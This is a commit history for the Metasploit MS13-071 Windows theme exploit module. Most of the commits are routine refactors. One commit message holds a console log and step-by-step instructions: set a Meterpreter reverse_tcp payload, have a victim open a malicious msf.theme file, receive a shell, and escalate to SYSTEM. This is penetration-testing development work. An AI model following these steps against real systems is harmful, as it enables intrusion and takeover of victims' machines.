Commit Graph

18 Commits (9f4f478d2ddc021fcc1a810bee7f42030a243566)

Author SHA1 Message Date
jvazquez-r7 a06eb04d59 Deregister FOLDER_NAME on exploit modules 2015-03-05 12:27:12 -06:00
jvazquez-r7 aaab4b401a Fix indenting and use primer 2015-03-04 10:46:34 -06:00
jvazquez-r7 0e57277dc1 Do cleanup 2015-03-04 10:33:57 -06:00
jvazquez-r7 b9ed8178a9 Solve conflicts on ms13_071_theme 2015-03-04 10:28:52 -06:00
Matthew Hall 4757698c15 Modify primer to utilise file_contents macro. 2015-03-04 09:52:00 +00:00
Matthew Hall e6ecdde451 Modify SMB generation code to use primer based on #3074 changes to
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
2015-02-20 11:35:22 +00:00
jvazquez-r7 0372b08d83 Fix mixin usage on modules 2015-02-13 17:17:59 -06:00
URI Assassin 35d3bbf74d
Fix up comment splats with the correct URI
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
2014-10-17 11:47:33 -05:00
Matthew Hall f72d54b9df Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer`
This commit refactors the ms13_071_theme module written by @jvazquez-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.

```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file

* Windows XP SP3
2014-04-30 12:14:58 +01:00
Tod Beardsley c83262f4bd
Resplat another common boilerplate. 2013-10-15 14:07:48 -05:00
Tod Beardsley 23d058067a
Redo the boilerplate / splat
[SeeRM #8496]
2013-10-15 13:51:57 -05:00
sinn3r 23b0c3b723 Add Metasploit blog references
These modules have blogs from the Rapid7 community, we should add them.
2013-10-01 20:50:16 -05:00
Tod Beardsley 2656c63459 Knock out a Unicode character 2013-09-23 14:22:11 -05:00
Tod Beardsley 4bff8f2cdc Update descriptions for clarity. 2013-09-23 13:48:23 -05:00
jvazquez-r7 8417b916c7 Complete MS13-071 Information 2013-09-21 21:22:34 -05:00
jvazquez-r7 9b486e1dbb Add comment about the smb_* methods 2013-09-19 13:23:46 -05:00
jvazquez-r7 60d448f600 Add minor cleanup 2013-09-18 14:10:13 -05:00
jvazquez-r7 68647c7363 Add module for MS13-071 2013-09-18 13:40:35 -05:00